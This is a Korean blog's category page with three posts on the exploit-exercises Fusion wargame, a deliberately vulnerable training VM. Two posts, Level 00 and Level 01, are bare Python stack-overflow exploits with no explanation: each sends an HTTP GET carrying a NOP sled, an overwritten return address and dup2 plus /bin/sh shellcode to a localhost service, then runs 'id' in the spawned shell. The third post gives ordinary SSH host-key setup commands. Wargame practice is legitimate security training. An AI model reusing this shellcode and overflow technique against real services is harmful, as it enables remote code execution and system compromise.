검색결과 리스트
exploit-exercises에 해당되는 글 3건
- 2013.05.31 [exploit-exercises] Fusion level 01
- 2013.05.31 [exploit-exercises] Fusion level 00 (3)
- 2013.05.31 [exploit-exercises] ssh setting
글
from struct import * from socket import * import time fd=4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # bin/sh shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\ "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',20001)) #raw_input("go? ") buf = "" buf += "GET " buf += "\x90"*139 buf += pack('<I',0x8049f4f) # jmp esp buf += "\x90" *100 buf += shellcode buf += " HTTP/1.1" s.send(buf) s.send("id\n") get = s.recv(1024) print get s.close()
'Computer Security > WarGame' 카테고리의 다른 글
[exploit-exercises] Fusion level 03 (0) | 2013.07.11 |
---|---|
[exploit-exercises] Fusion level 02 (0) | 2013.07.09 |
[exploit-exercises] Fusion level 01 (0) | 2013.05.31 |
[exploit-exercises] Fusion level 00 (3) | 2013.05.31 |
[exploit-exercises] ssh setting (0) | 2013.05.31 |
[BOF원정대/Fedora4] cruel -> enigma (5) | 2013.05.31 |
트랙백
댓글
글
from struct import * from socket import * import time fd=4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # bin/sh shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\ "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',20000)) print s.recv(1024) #raw_input("go? ") buf = "" buf += "GET " buf += "\x90"*139 buf += "\x5c\xa1\xf8\xbf" buf += "\x90" *100 buf += shellcode buf += " HTTP/1.1" s.send(buf) s.send("id\n") get = s.recv(1024) print get s.close()
'Computer Security > WarGame' 카테고리의 다른 글
[exploit-exercises] Fusion level 02 (0) | 2013.07.09 |
---|---|
[exploit-exercises] Fusion level 01 (0) | 2013.05.31 |
[exploit-exercises] Fusion level 00 (3) | 2013.05.31 |
[exploit-exercises] ssh setting (0) | 2013.05.31 |
[BOF원정대/Fedora4] cruel -> enigma (5) | 2013.05.31 |
[BOF원정대/Fedora4] dark_stone -> cruel (0) | 2013.05.09 |
트랙백
댓글
글
처음에 putty로 ssh 접속을 못해서 좀 해맸는데,
우선 root권한으로(또는 sudo) 접속한후,
# ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key
# ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key
를 해줘야 putty로 접속 가능하다.
'Computer Security > WarGame' 카테고리의 다른 글
[exploit-exercises] Fusion level 01 (0) | 2013.05.31 |
---|---|
[exploit-exercises] Fusion level 00 (3) | 2013.05.31 |
[exploit-exercises] ssh setting (0) | 2013.05.31 |
[BOF원정대/Fedora4] cruel -> enigma (5) | 2013.05.31 |
[BOF원정대/Fedora4] dark_stone -> cruel (0) | 2013.05.09 |
[BOF원정대/Fedora3] evil_wizard -> dark_stone (4) | 2013.05.09 |